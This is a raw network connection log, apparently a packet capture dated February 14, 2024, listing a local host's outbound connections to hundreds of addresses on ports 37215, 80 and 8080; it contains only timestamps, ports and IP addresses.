Feb 14, 2024 09:28:46.292699099 CET	8096	37215	192.168.2.15	41.55.140.201
Feb 14, 2024 09:28:46.292726040 CET	8096	37215	192.168.2.15	41.56.93.194
Feb 14, 2024 09:28:46.292727947 CET	8096	37215	192.168.2.15	41.196.52.75
Feb 14, 2024 09:28:46.292749882 CET	8096	37215	192.168.2.15	41.133.43.54
Feb 14, 2024 09:28:46.292773962 CET	8096	37215	192.168.2.15	41.111.177.164
Feb 14, 2024 09:28:46.292824030 CET	8096	37215	192.168.2.15	41.155.178.207
Feb 14, 2024 09:28:46.292840958 CET	8096	37215	192.168.2.15	41.231.197.223
Feb 14, 2024 09:28:46.292870045 CET	8096	37215	192.168.2.15	41.226.226.151
Feb 14, 2024 09:28:46.292872906 CET	8096	37215	192.168.2.15	41.3.140.248
Feb 14, 2024 09:28:46.292890072 CET	8096	37215	192.168.2.15	41.147.159.82
Feb 14, 2024 09:28:46.292921066 CET	8096	37215	192.168.2.15	41.122.116.213
Feb 14, 2024 09:28:46.292933941 CET	8096	37215	192.168.2.15	41.255.186.222
Feb 14, 2024 09:28:46.292933941 CET	8096	37215	192.168.2.15	41.32.143.244
Feb 14, 2024 09:28:46.292951107 CET	8096	37215	192.168.2.15	41.172.219.37
Feb 14, 2024 09:28:46.292967081 CET	8096	37215	192.168.2.15	41.102.22.99
Feb 14, 2024 09:28:46.293015003 CET	8096	37215	192.168.2.15	41.100.255.116
Feb 14, 2024 09:28:46.293028116 CET	8096	37215	192.168.2.15	41.22.132.142
Feb 14, 2024 09:28:46.293031931 CET	8096	37215	192.168.2.15	41.49.129.214
Feb 14, 2024 09:28:46.293062925 CET	8096	37215	192.168.2.15	41.212.248.26
Feb 14, 2024 09:28:46.293065071 CET	8096	37215	192.168.2.15	41.216.127.22
Feb 14, 2024 09:28:46.293081045 CET	8096	37215	192.168.2.15	41.221.235.60
Feb 14, 2024 09:28:46.293118000 CET	8096	37215	192.168.2.15	41.90.195.223
Feb 14, 2024 09:28:46.293123007 CET	8096	37215	192.168.2.15	41.247.46.83
Feb 14, 2024 09:28:46.293152094 CET	8096	37215	192.168.2.15	41.215.147.175
Feb 14, 2024 09:28:46.293152094 CET	8096	37215	192.168.2.15	41.153.83.60
Feb 14, 2024 09:28:46.293186903 CET	8096	37215	192.168.2.15	41.102.64.105
Feb 14, 2024 09:28:46.293205976 CET	8096	37215	192.168.2.15	41.64.7.32
Feb 14, 2024 09:28:46.293219090 CET	8096	37215	192.168.2.15	41.207.197.235
Feb 14, 2024 09:28:46.293260098 CET	8096	37215	192.168.2.15	41.85.188.153
Feb 14, 2024 09:28:46.293277025 CET	8096	37215	192.168.2.15	41.59.220.145
Feb 14, 2024 09:28:46.293299913 CET	8096	37215	192.168.2.15	41.134.129.240
Feb 14, 2024 09:28:46.293303013 CET	8096	37215	192.168.2.15	41.77.133.184
Feb 14, 2024 09:28:46.293313026 CET	8096	37215	192.168.2.15	41.72.42.197
Feb 14, 2024 09:28:46.293355942 CET	8096	37215	192.168.2.15	41.165.50.173
Feb 14, 2024 09:28:46.293385029 CET	8096	37215	192.168.2.15	41.146.40.136
Feb 14, 2024 09:28:46.293396950 CET	8096	37215	192.168.2.15	41.236.82.113
Feb 14, 2024 09:28:46.293396950 CET	8096	37215	192.168.2.15	41.92.120.239
Feb 14, 2024 09:28:46.293421984 CET	8096	37215	192.168.2.15	41.148.122.240
Feb 14, 2024 09:28:46.293423891 CET	8096	37215	192.168.2.15	41.193.131.213
Feb 14, 2024 09:28:46.293437958 CET	8096	37215	192.168.2.15	41.205.1.48
Feb 14, 2024 09:28:46.293466091 CET	8096	37215	192.168.2.15	41.66.121.251
Feb 14, 2024 09:28:46.293488026 CET	8096	37215	192.168.2.15	41.29.172.25
Feb 14, 2024 09:28:46.293504953 CET	8096	37215	192.168.2.15	41.114.219.171
Feb 14, 2024 09:28:46.293523073 CET	8096	37215	192.168.2.15	41.226.39.233
Feb 14, 2024 09:28:46.293543100 CET	8096	37215	192.168.2.15	41.93.176.109
Feb 14, 2024 09:28:46.293546915 CET	8096	37215	192.168.2.15	41.45.154.80
Feb 14, 2024 09:28:46.293570042 CET	8096	37215	192.168.2.15	41.35.30.82
Feb 14, 2024 09:28:46.293606043 CET	8096	37215	192.168.2.15	41.108.196.14
Feb 14, 2024 09:28:46.293626070 CET	8096	37215	192.168.2.15	41.32.121.251
Feb 14, 2024 09:28:46.293648958 CET	8096	37215	192.168.2.15	41.80.150.246
Feb 14, 2024 09:28:46.293672085 CET	8096	37215	192.168.2.15	41.62.216.165
Feb 14, 2024 09:28:46.293684959 CET	8096	37215	192.168.2.15	41.184.196.229
Feb 14, 2024 09:28:46.293706894 CET	8096	37215	192.168.2.15	41.37.245.146
Feb 14, 2024 09:28:46.293720961 CET	8096	37215	192.168.2.15	41.36.46.194
Feb 14, 2024 09:28:46.293755054 CET	8096	37215	192.168.2.15	41.215.103.33
Feb 14, 2024 09:28:46.293766022 CET	8096	37215	192.168.2.15	41.21.16.3
Feb 14, 2024 09:28:46.293766975 CET	8096	37215	192.168.2.15	41.73.33.231
Feb 14, 2024 09:28:46.293798923 CET	8096	37215	192.168.2.15	41.18.144.160
Feb 14, 2024 09:28:46.293816090 CET	8096	37215	192.168.2.15	41.222.15.167
Feb 14, 2024 09:28:46.293843985 CET	8096	37215	192.168.2.15	41.57.161.200
Feb 14, 2024 09:28:46.293862104 CET	8096	37215	192.168.2.15	41.93.57.84
Feb 14, 2024 09:28:46.293874025 CET	8096	37215	192.168.2.15	41.255.121.183
Feb 14, 2024 09:28:46.293895960 CET	8096	37215	192.168.2.15	41.179.83.213
Feb 14, 2024 09:28:46.293895960 CET	8096	37215	192.168.2.15	41.163.116.89
Feb 14, 2024 09:28:46.293906927 CET	8096	37215	192.168.2.15	41.231.29.148
Feb 14, 2024 09:28:46.293925047 CET	8096	37215	192.168.2.15	41.250.25.109
Feb 14, 2024 09:28:46.293970108 CET	8096	37215	192.168.2.15	41.95.210.159
Feb 14, 2024 09:28:46.295192003 CET	8096	37215	192.168.2.15	41.47.17.47
Feb 14, 2024 09:28:46.295196056 CET	8096	37215	192.168.2.15	41.154.126.140
Feb 14, 2024 09:28:46.366280079 CET	7840	80	192.168.2.15	112.85.173.211
Feb 14, 2024 09:28:46.366280079 CET	7840	80	192.168.2.15	112.115.146.106
Feb 14, 2024 09:28:46.366328955 CET	7840	80	192.168.2.15	112.170.249.207
Feb 14, 2024 09:28:46.366348028 CET	7840	80	192.168.2.15	112.218.160.106
Feb 14, 2024 09:28:46.366384983 CET	7840	80	192.168.2.15	112.24.122.109
Feb 14, 2024 09:28:46.366401911 CET	7840	80	192.168.2.15	112.97.149.40
Feb 14, 2024 09:28:46.366450071 CET	7840	80	192.168.2.15	112.136.27.184
Feb 14, 2024 09:28:46.366452932 CET	7840	80	192.168.2.15	112.31.51.1
Feb 14, 2024 09:28:46.366456985 CET	7840	80	192.168.2.15	112.16.151.135
Feb 14, 2024 09:28:46.366465092 CET	7840	80	192.168.2.15	112.65.182.62
Feb 14, 2024 09:28:46.366506100 CET	7840	80	192.168.2.15	112.108.170.63
Feb 14, 2024 09:28:46.366529942 CET	7840	80	192.168.2.15	112.207.125.187
Feb 14, 2024 09:28:46.366537094 CET	7840	80	192.168.2.15	112.200.29.171
Feb 14, 2024 09:28:46.366558075 CET	7840	80	192.168.2.15	112.149.66.59
Feb 14, 2024 09:28:46.366581917 CET	7840	80	192.168.2.15	112.184.52.182
Feb 14, 2024 09:28:46.366600037 CET	7840	80	192.168.2.15	112.175.243.56
Feb 14, 2024 09:28:46.366626024 CET	7840	80	192.168.2.15	112.118.132.74
Feb 14, 2024 09:28:46.366626024 CET	7840	80	192.168.2.15	112.187.117.19
Feb 14, 2024 09:28:46.366645098 CET	7840	80	192.168.2.15	112.24.157.75
Feb 14, 2024 09:28:46.366669893 CET	7840	80	192.168.2.15	112.110.236.40
Feb 14, 2024 09:28:46.366688013 CET	7840	80	192.168.2.15	112.67.13.196
Feb 14, 2024 09:28:46.366725922 CET	7840	80	192.168.2.15	112.148.126.112
Feb 14, 2024 09:28:46.366750002 CET	7840	80	192.168.2.15	112.80.103.86
Feb 14, 2024 09:28:46.366794109 CET	7840	80	192.168.2.15	112.228.203.166
Feb 14, 2024 09:28:46.366817951 CET	7840	80	192.168.2.15	112.136.169.192
Feb 14, 2024 09:28:46.366863966 CET	7840	80	192.168.2.15	112.123.199.58
Feb 14, 2024 09:28:46.366875887 CET	7840	80	192.168.2.15	112.121.98.185
Feb 14, 2024 09:28:46.366898060 CET	7840	80	192.168.2.15	112.14.48.67
Feb 14, 2024 09:28:46.366924047 CET	7840	80	192.168.2.15	112.203.182.37
Feb 14, 2024 09:28:46.366938114 CET	7840	80	192.168.2.15	112.42.187.211
Feb 14, 2024 09:28:46.366949081 CET	7840	80	192.168.2.15	112.143.67.115
Feb 14, 2024 09:28:46.366967916 CET	7840	80	192.168.2.15	112.93.57.133
Feb 14, 2024 09:28:46.366986990 CET	7840	80	192.168.2.15	112.189.240.247
Feb 14, 2024 09:28:46.367001057 CET	7840	80	192.168.2.15	112.135.211.255
Feb 14, 2024 09:28:46.367041111 CET	7840	80	192.168.2.15	112.160.138.206
Feb 14, 2024 09:28:46.367043018 CET	7840	80	192.168.2.15	112.229.143.16
Feb 14, 2024 09:28:46.367064953 CET	7840	80	192.168.2.15	112.88.85.16
Feb 14, 2024 09:28:46.367100000 CET	7840	80	192.168.2.15	112.91.151.192
Feb 14, 2024 09:28:46.367121935 CET	7840	80	192.168.2.15	112.240.174.250
Feb 14, 2024 09:28:46.367132902 CET	7840	80	192.168.2.15	112.179.64.30
Feb 14, 2024 09:28:46.367132902 CET	7840	80	192.168.2.15	112.125.213.33
Feb 14, 2024 09:28:46.367176056 CET	7840	80	192.168.2.15	112.199.152.154
Feb 14, 2024 09:28:46.367183924 CET	7840	80	192.168.2.15	112.206.14.62
Feb 14, 2024 09:28:46.367218018 CET	7840	80	192.168.2.15	112.195.57.187
Feb 14, 2024 09:28:46.367253065 CET	7840	80	192.168.2.15	112.124.176.147
Feb 14, 2024 09:28:46.367268085 CET	7840	80	192.168.2.15	112.168.198.120
Feb 14, 2024 09:28:46.367285967 CET	7840	80	192.168.2.15	112.254.248.189
Feb 14, 2024 09:28:46.367300987 CET	7840	80	192.168.2.15	112.120.216.190
Feb 14, 2024 09:28:46.367300987 CET	7840	80	192.168.2.15	112.204.74.228
Feb 14, 2024 09:28:46.367300987 CET	7840	80	192.168.2.15	112.246.90.29
Feb 14, 2024 09:28:46.367353916 CET	7840	80	192.168.2.15	112.98.118.35
Feb 14, 2024 09:28:46.367361069 CET	7840	80	192.168.2.15	112.132.169.54
Feb 14, 2024 09:28:46.367361069 CET	7840	80	192.168.2.15	112.171.237.22
Feb 14, 2024 09:28:46.367403984 CET	7840	80	192.168.2.15	112.152.250.224
Feb 14, 2024 09:28:46.367417097 CET	7840	80	192.168.2.15	112.211.137.23
Feb 14, 2024 09:28:46.367446899 CET	7840	80	192.168.2.15	112.196.212.112
Feb 14, 2024 09:28:46.367458105 CET	7840	80	192.168.2.15	112.115.74.124
Feb 14, 2024 09:28:46.367476940 CET	7840	80	192.168.2.15	112.232.137.244
Feb 14, 2024 09:28:46.367476940 CET	7840	80	192.168.2.15	112.189.131.174
Feb 14, 2024 09:28:46.367497921 CET	7840	80	192.168.2.15	112.192.232.98
Feb 14, 2024 09:28:46.367553949 CET	7840	80	192.168.2.15	112.103.143.16
Feb 14, 2024 09:28:46.367573023 CET	7840	80	192.168.2.15	112.237.231.106
Feb 14, 2024 09:28:46.367608070 CET	7840	80	192.168.2.15	112.24.235.178
Feb 14, 2024 09:28:46.367630959 CET	7840	80	192.168.2.15	112.223.39.29
Feb 14, 2024 09:28:46.367639065 CET	7840	80	192.168.2.15	112.21.143.16
Feb 14, 2024 09:28:46.367652893 CET	7840	80	192.168.2.15	112.12.35.142
Feb 14, 2024 09:28:46.367671967 CET	7840	80	192.168.2.15	112.80.105.67
Feb 14, 2024 09:28:46.367686033 CET	7840	80	192.168.2.15	112.97.183.189
Feb 14, 2024 09:28:46.367705107 CET	7840	80	192.168.2.15	112.49.146.180
Feb 14, 2024 09:28:46.367722034 CET	7840	80	192.168.2.15	112.210.40.160
Feb 14, 2024 09:28:46.367750883 CET	7840	80	192.168.2.15	112.61.115.143
Feb 14, 2024 09:28:46.367786884 CET	7840	80	192.168.2.15	112.35.32.71
Feb 14, 2024 09:28:46.367805958 CET	7840	80	192.168.2.15	112.221.21.100
Feb 14, 2024 09:28:46.367839098 CET	7840	80	192.168.2.15	112.143.166.159
Feb 14, 2024 09:28:46.367872953 CET	7840	80	192.168.2.15	112.48.175.130
Feb 14, 2024 09:28:46.367883921 CET	7840	80	192.168.2.15	112.231.79.150
Feb 14, 2024 09:28:46.367883921 CET	7840	80	192.168.2.15	112.155.39.34
Feb 14, 2024 09:28:46.367919922 CET	7840	80	192.168.2.15	112.143.125.95
Feb 14, 2024 09:28:46.367945910 CET	7840	80	192.168.2.15	112.160.22.51
Feb 14, 2024 09:28:46.367955923 CET	7840	80	192.168.2.15	112.150.252.182
Feb 14, 2024 09:28:46.368006945 CET	7840	80	192.168.2.15	112.172.80.148
Feb 14, 2024 09:28:46.368010998 CET	7840	80	192.168.2.15	112.251.48.147
Feb 14, 2024 09:28:46.368048906 CET	7840	80	192.168.2.15	112.86.2.177
Feb 14, 2024 09:28:46.368050098 CET	7840	80	192.168.2.15	112.144.132.186
Feb 14, 2024 09:28:46.368083000 CET	7840	80	192.168.2.15	112.219.167.72
Feb 14, 2024 09:28:46.368092060 CET	7840	80	192.168.2.15	112.223.246.158
Feb 14, 2024 09:28:46.368092060 CET	7840	80	192.168.2.15	112.212.151.129
Feb 14, 2024 09:28:46.368171930 CET	7840	80	192.168.2.15	112.202.35.153
Feb 14, 2024 09:28:46.368175030 CET	7840	80	192.168.2.15	112.87.176.3
Feb 14, 2024 09:28:46.368179083 CET	7840	80	192.168.2.15	112.116.158.165
Feb 14, 2024 09:28:46.368191957 CET	7840	80	192.168.2.15	112.17.58.97
Feb 14, 2024 09:28:46.368216038 CET	7840	80	192.168.2.15	112.38.134.140
Feb 14, 2024 09:28:46.368257999 CET	7840	80	192.168.2.15	112.233.222.95
Feb 14, 2024 09:28:46.368258953 CET	7840	80	192.168.2.15	112.46.107.97
Feb 14, 2024 09:28:46.368273973 CET	7840	80	192.168.2.15	112.19.100.17
Feb 14, 2024 09:28:46.368284941 CET	7840	80	192.168.2.15	112.105.50.34
Feb 14, 2024 09:28:46.368318081 CET	7840	80	192.168.2.15	112.173.147.111
Feb 14, 2024 09:28:46.368336916 CET	7840	80	192.168.2.15	112.212.40.218
Feb 14, 2024 09:28:46.368350029 CET	7840	80	192.168.2.15	112.33.29.171
Feb 14, 2024 09:28:46.368379116 CET	7840	80	192.168.2.15	112.180.15.84
Feb 14, 2024 09:28:46.368406057 CET	7840	80	192.168.2.15	112.70.18.193
Feb 14, 2024 09:28:46.368406057 CET	7840	80	192.168.2.15	112.157.214.225
Feb 14, 2024 09:28:46.368436098 CET	7840	80	192.168.2.15	112.242.63.118
Feb 14, 2024 09:28:46.368478060 CET	7840	80	192.168.2.15	112.166.61.94
Feb 14, 2024 09:28:46.368488073 CET	7840	80	192.168.2.15	112.96.181.156
Feb 14, 2024 09:28:46.368505001 CET	7840	80	192.168.2.15	112.189.144.42
Feb 14, 2024 09:28:46.368525028 CET	7840	80	192.168.2.15	112.179.224.161
Feb 14, 2024 09:28:46.368544102 CET	7840	80	192.168.2.15	112.41.194.7
Feb 14, 2024 09:28:46.368567944 CET	7840	80	192.168.2.15	112.106.172.36
Feb 14, 2024 09:28:46.368586063 CET	7840	80	192.168.2.15	112.37.24.53
Feb 14, 2024 09:28:46.368617058 CET	7840	80	192.168.2.15	112.249.186.29
Feb 14, 2024 09:28:46.368638039 CET	7840	80	192.168.2.15	112.73.215.126
Feb 14, 2024 09:28:46.368666887 CET	7840	80	192.168.2.15	112.2.45.54
Feb 14, 2024 09:28:46.368690968 CET	7840	80	192.168.2.15	112.76.92.44
Feb 14, 2024 09:28:46.368707895 CET	7840	80	192.168.2.15	112.188.221.37
Feb 14, 2024 09:28:46.368731976 CET	7840	80	192.168.2.15	112.79.180.164
Feb 14, 2024 09:28:46.368751049 CET	7840	80	192.168.2.15	112.224.245.48
Feb 14, 2024 09:28:46.368774891 CET	7840	80	192.168.2.15	112.80.240.63
Feb 14, 2024 09:28:46.368787050 CET	7840	80	192.168.2.15	112.20.42.231
Feb 14, 2024 09:28:46.368798971 CET	7840	80	192.168.2.15	112.6.81.151
Feb 14, 2024 09:28:46.368855953 CET	7840	80	192.168.2.15	112.205.90.222
Feb 14, 2024 09:28:46.368863106 CET	7840	80	192.168.2.15	112.41.82.138
Feb 14, 2024 09:28:46.368868113 CET	7840	80	192.168.2.15	112.223.227.105
Feb 14, 2024 09:28:46.368870974 CET	7840	80	192.168.2.15	112.97.101.62
Feb 14, 2024 09:28:46.368889093 CET	7840	80	192.168.2.15	112.186.23.13
Feb 14, 2024 09:28:46.368946075 CET	7840	80	192.168.2.15	112.89.38.242
Feb 14, 2024 09:28:46.368972063 CET	7840	80	192.168.2.15	112.244.250.217
Feb 14, 2024 09:28:46.368988991 CET	7840	80	192.168.2.15	112.48.180.187
Feb 14, 2024 09:28:46.369015932 CET	7840	80	192.168.2.15	112.252.9.28
Feb 14, 2024 09:28:46.369036913 CET	7840	80	192.168.2.15	112.26.23.173
Feb 14, 2024 09:28:46.369061947 CET	7840	80	192.168.2.15	112.173.116.218
Feb 14, 2024 09:28:46.369103909 CET	7840	80	192.168.2.15	112.95.5.39
Feb 14, 2024 09:28:46.369122982 CET	7840	80	192.168.2.15	112.223.199.51
Feb 14, 2024 09:28:46.369131088 CET	7840	80	192.168.2.15	112.203.123.86
Feb 14, 2024 09:28:46.369149923 CET	7840	80	192.168.2.15	112.120.50.124
Feb 14, 2024 09:28:46.369165897 CET	7840	80	192.168.2.15	112.40.67.196
Feb 14, 2024 09:28:46.369199038 CET	7840	80	192.168.2.15	112.109.28.70
Feb 14, 2024 09:28:46.369220972 CET	7840	80	192.168.2.15	112.129.28.4
Feb 14, 2024 09:28:46.369240046 CET	7840	80	192.168.2.15	112.11.197.53
Feb 14, 2024 09:28:46.369240046 CET	7840	80	192.168.2.15	112.108.242.189
Feb 14, 2024 09:28:46.369260073 CET	7840	80	192.168.2.15	112.24.1.140
Feb 14, 2024 09:28:46.369297028 CET	7840	80	192.168.2.15	112.176.165.192
Feb 14, 2024 09:28:46.369321108 CET	7840	80	192.168.2.15	112.165.248.18
Feb 14, 2024 09:28:46.369330883 CET	7840	80	192.168.2.15	112.162.27.143
Feb 14, 2024 09:28:46.369340897 CET	7840	80	192.168.2.15	112.252.15.207
Feb 14, 2024 09:28:46.369347095 CET	7840	80	192.168.2.15	112.85.11.152
Feb 14, 2024 09:28:46.369365931 CET	7840	80	192.168.2.15	112.62.33.117
Feb 14, 2024 09:28:46.369426966 CET	7840	80	192.168.2.15	112.174.132.231
Feb 14, 2024 09:28:46.369437933 CET	7840	80	192.168.2.15	112.255.255.183
Feb 14, 2024 09:28:46.369476080 CET	7840	80	192.168.2.15	112.243.108.211
Feb 14, 2024 09:28:46.369483948 CET	7840	80	192.168.2.15	112.80.175.120
Feb 14, 2024 09:28:46.369498968 CET	7840	80	192.168.2.15	112.198.71.132
Feb 14, 2024 09:28:46.369514942 CET	7840	80	192.168.2.15	112.174.198.141
Feb 14, 2024 09:28:46.369549036 CET	7840	80	192.168.2.15	112.91.18.86
Feb 14, 2024 09:28:46.369586945 CET	7840	80	192.168.2.15	112.42.96.204
Feb 14, 2024 09:28:46.369586945 CET	7840	80	192.168.2.15	112.80.112.155
Feb 14, 2024 09:28:46.369587898 CET	7840	80	192.168.2.15	112.14.106.68
Feb 14, 2024 09:28:46.369632006 CET	7840	80	192.168.2.15	112.142.65.158
Feb 14, 2024 09:28:46.369635105 CET	7840	80	192.168.2.15	112.86.145.99
Feb 14, 2024 09:28:46.369649887 CET	7840	80	192.168.2.15	112.149.123.103
Feb 14, 2024 09:28:46.370016098 CET	58378	80	192.168.2.15	88.221.78.210
Feb 14, 2024 09:28:46.370088100 CET	56704	80	192.168.2.15	88.149.181.115
Feb 14, 2024 09:28:46.370109081 CET	53226	80	192.168.2.15	88.119.167.115
Feb 14, 2024 09:28:46.381958008 CET	6752	8080	192.168.2.15	62.132.114.59
Feb 14, 2024 09:28:46.381958008 CET	6752	8080	192.168.2.15	94.240.188.163
Feb 14, 2024 09:28:46.381999969 CET	6752	8080	192.168.2.15	95.158.252.138
Feb 14, 2024 09:28:46.382014990 CET	6752	8080	192.168.2.15	62.206.172.248
Feb 14, 2024 09:28:46.382025957 CET	6752	8080	192.168.2.15	85.6.201.167
Feb 14, 2024 09:28:46.382033110 CET	6752	8080	192.168.2.15	94.232.223.133
Feb 14, 2024 09:28:46.382035971 CET	6752	8080	192.168.2.15	62.169.234.207
Feb 14, 2024 09:28:46.382035971 CET	6752	8080	192.168.2.15	62.55.124.65
Feb 14, 2024 09:28:46.382036924 CET	6752	8080	192.168.2.15	94.7.160.33
Feb 14, 2024 09:28:46.382049084 CET	6752	8080	192.168.2.15	31.149.130.69
Feb 14, 2024 09:28:46.382049084 CET	6752	8080	192.168.2.15	85.173.73.73
Feb 14, 2024 09:28:46.382055044 CET	6752	8080	192.168.2.15	85.193.220.253
Feb 14, 2024 09:28:46.382055044 CET	6752	8080	192.168.2.15	95.50.12.150
Feb 14, 2024 09:28:46.382069111 CET	6752	8080	192.168.2.15	62.128.20.219
Feb 14, 2024 09:28:46.382069111 CET	6752	8080	192.168.2.15	31.220.4.214
Feb 14, 2024 09:28:46.382085085 CET	6752	8080	192.168.2.15	94.43.2.21
Feb 14, 2024 09:28:46.382102966 CET	6752	8080	192.168.2.15	31.215.199.189
Feb 14, 2024 09:28:46.382112026 CET	6752	8080	192.168.2.15	31.189.56.42
Feb 14, 2024 09:28:46.382112980 CET	6752	8080	192.168.2.15	95.226.185.46
Feb 14, 2024 09:28:46.382138968 CET	6752	8080	192.168.2.15	31.57.67.2
Feb 14, 2024 09:28:46.382139921 CET	6752	8080	192.168.2.15	94.196.192.165
Feb 14, 2024 09:28:46.382147074 CET	6752	8080	192.168.2.15	95.40.68.150
Feb 14, 2024 09:28:46.382148027 CET	6752	8080	192.168.2.15	85.163.238.143
Feb 14, 2024 09:28:46.382147074 CET	6752	8080	192.168.2.15	94.209.230.221
Feb 14, 2024 09:28:46.382148027 CET	6752	8080	192.168.2.15	62.96.61.219
Feb 14, 2024 09:28:46.382153034 CET	6752	8080	192.168.2.15	94.6.112.214
Feb 14, 2024 09:28:46.382167101 CET	6752	8080	192.168.2.15	31.208.41.180
Feb 14, 2024 09:28:46.382167101 CET	6752	8080	192.168.2.15	62.175.81.127
Feb 14, 2024 09:28:46.382190943 CET	6752	8080	192.168.2.15	31.145.226.249
Feb 14, 2024 09:28:46.382200003 CET	6752	8080	192.168.2.15	85.165.11.23
Feb 14, 2024 09:28:46.382200003 CET	6752	8080	192.168.2.15	85.39.235.202
Feb 14, 2024 09:28:46.382201910 CET	6752	8080	192.168.2.15	31.110.165.3
Feb 14, 2024 09:28:46.382224083 CET	6752	8080	192.168.2.15	95.90.166.226
Feb 14, 2024 09:28:46.382231951 CET	6752	8080	192.168.2.15	85.160.228.252
Feb 14, 2024 09:28:46.382235050 CET	6752	8080	192.168.2.15	85.179.143.163
Feb 14, 2024 09:28:46.382235050 CET	6752	8080	192.168.2.15	85.195.197.233
Feb 14, 2024 09:28:46.382236958 CET	6752	8080	192.168.2.15	95.142.76.19
Feb 14, 2024 09:28:46.382260084 CET	6752	8080	192.168.2.15	95.130.116.177
Feb 14, 2024 09:28:46.382265091 CET	6752	8080	192.168.2.15	62.133.253.142
Feb 14, 2024 09:28:46.382282972 CET	6752	8080	192.168.2.15	62.80.74.192
Feb 14, 2024 09:28:46.382296085 CET	6752	8080	192.168.2.15	94.216.252.87
Feb 14, 2024 09:28:46.382301092 CET	6752	8080	192.168.2.15	85.244.53.133
Feb 14, 2024 09:28:46.382312059 CET	6752	8080	192.168.2.15	95.114.195.122
Feb 14, 2024 09:28:46.382320881 CET	6752	8080	192.168.2.15	85.206.48.158
Feb 14, 2024 09:28:46.382319927 CET	6752	8080	192.168.2.15	85.193.144.162
Feb 14, 2024 09:28:46.382332087 CET	6752	8080	192.168.2.15	62.205.137.68
Feb 14, 2024 09:28:46.382338047 CET	6752	8080	192.168.2.15	62.145.229.89
Feb 14, 2024 09:28:46.382350922 CET	6752	8080	192.168.2.15	62.241.14.123
Feb 14, 2024 09:28:46.382364035 CET	6752	8080	192.168.2.15	85.89.61.34
Feb 14, 2024 09:28:46.382374048 CET	6752	8080	192.168.2.15	95.196.189.141
Feb 14, 2024 09:28:46.382388115 CET	6752	8080	192.168.2.15	94.248.163.54
Feb 14, 2024 09:28:46.382406950 CET	6752	8080	192.168.2.15	85.225.12.122
Feb 14, 2024 09:28:46.382410049 CET	6752	8080	192.168.2.15	85.128.72.125
Feb 14, 2024 09:28:46.382436037 CET	6752	8080	192.168.2.15	85.197.61.167
Feb 14, 2024 09:28:46.382436037 CET	6752	8080	192.168.2.15	94.36.179.223
Feb 14, 2024 09:28:46.382436037 CET	6752	8080	192.168.2.15	94.16.108.35
Feb 14, 2024 09:28:46.382455111 CET	6752	8080	192.168.2.15	62.243.47.157
Feb 14, 2024 09:28:46.382467031 CET	6752	8080	192.168.2.15	94.233.136.180
Feb 14, 2024 09:28:46.382467031 CET	6752	8080	192.168.2.15	94.246.172.92
Feb 14, 2024 09:28:46.382469893 CET	6752	8080	192.168.2.15	62.72.250.87
Feb 14, 2024 09:28:46.382498980 CET	6752	8080	192.168.2.15	31.240.185.153
Feb 14, 2024 09:28:46.382514000 CET	6752	8080	192.168.2.15	95.180.186.243
Feb 14, 2024 09:28:46.382514000 CET	6752	8080	192.168.2.15	31.171.79.202
Feb 14, 2024 09:28:46.382519007 CET	6752	8080	192.168.2.15	95.123.119.201
Feb 14, 2024 09:28:46.382519007 CET	6752	8080	192.168.2.15	85.0.175.25
Feb 14, 2024 09:28:46.382520914 CET	6752	8080	192.168.2.15	62.202.73.36
Feb 14, 2024 09:28:46.382522106 CET	6752	8080	192.168.2.15	95.148.63.36
Feb 14, 2024 09:28:46.382522106 CET	6752	8080	192.168.2.15	85.18.160.52
Feb 14, 2024 09:28:46.382522106 CET	6752	8080	192.168.2.15	31.203.125.19
Feb 14, 2024 09:28:46.382524014 CET	6752	8080	192.168.2.15	94.90.97.180
Feb 14, 2024 09:28:46.382520914 CET	6752	8080	192.168.2.15	31.21.239.224
Feb 14, 2024 09:28:46.382529974 CET	6752	8080	192.168.2.15	85.78.194.193
Feb 14, 2024 09:28:46.382534027 CET	6752	8080	192.168.2.15	94.201.6.202
Feb 14, 2024 09:28:46.382534027 CET	6752	8080	192.168.2.15	62.7.49.252
Feb 14, 2024 09:28:46.382534981 CET	6752	8080	192.168.2.15	85.39.122.135
Feb 14, 2024 09:28:46.382540941 CET	6752	8080	192.168.2.15	31.174.119.145
Feb 14, 2024 09:28:46.382539988 CET	6752	8080	192.168.2.15	85.28.60.202
Feb 14, 2024 09:28:46.382539988 CET	6752	8080	192.168.2.15	95.96.94.13
Feb 14, 2024 09:28:46.382554054 CET	6752	8080	192.168.2.15	94.17.38.174
Feb 14, 2024 09:28:46.382571936 CET	6752	8080	192.168.2.15	94.2.130.195
Feb 14, 2024 09:28:46.382580996 CET	6752	8080	192.168.2.15	85.94.151.163
Feb 14, 2024 09:28:46.382591009 CET	6752	8080	192.168.2.15	94.140.118.28
Feb 14, 2024 09:28:46.382591963 CET	6752	8080	192.168.2.15	94.223.82.161
Feb 14, 2024 09:28:46.382592916 CET	6752	8080	192.168.2.15	31.60.160.183
Feb 14, 2024 09:28:46.382596970 CET	6752	8080	192.168.2.15	85.21.54.29
Feb 14, 2024 09:28:46.382596970 CET	6752	8080	192.168.2.15	62.211.118.230
Feb 14, 2024 09:28:46.382603884 CET	6752	8080	192.168.2.15	31.6.239.77
Feb 14, 2024 09:28:46.382603884 CET	6752	8080	192.168.2.15	62.90.120.209
Feb 14, 2024 09:28:46.382605076 CET	6752	8080	192.168.2.15	31.127.96.90
Feb 14, 2024 09:28:46.382606983 CET	6752	8080	192.168.2.15	95.32.246.245
Feb 14, 2024 09:28:46.382606983 CET	6752	8080	192.168.2.15	31.144.35.226
Feb 14, 2024 09:28:46.382606983 CET	6752	8080	192.168.2.15	94.53.121.149
Feb 14, 2024 09:28:46.382606983 CET	6752	8080	192.168.2.15	95.18.6.77
Feb 14, 2024 09:28:46.382607937 CET	6752	8080	192.168.2.15	31.32.1.130
Feb 14, 2024 09:28:46.382625103 CET	6752	8080	192.168.2.15	95.26.93.199
Feb 14, 2024 09:28:46.382628918 CET	6752	8080	192.168.2.15	31.170.92.254
Feb 14, 2024 09:28:46.382669926 CET	6752	8080	192.168.2.15	94.80.81.184
Feb 14, 2024 09:28:46.382672071 CET	6752	8080	192.168.2.15	95.93.236.156
Feb 14, 2024 09:28:46.382674932 CET	6752	8080	192.168.2.15	85.123.2.223
Feb 14, 2024 09:28:46.382683039 CET	6752	8080	192.168.2.15	85.47.191.201
Feb 14, 2024 09:28:46.382697105 CET	6752	8080	192.168.2.15	85.110.32.19
Feb 14, 2024 09:28:46.382697105 CET	6752	8080	192.168.2.15	62.178.32.46
Feb 14, 2024 09:28:46.382697105 CET	6752	8080	192.168.2.15	95.202.89.242
Feb 14, 2024 09:28:46.382728100 CET	6752	8080	192.168.2.15	31.95.101.87
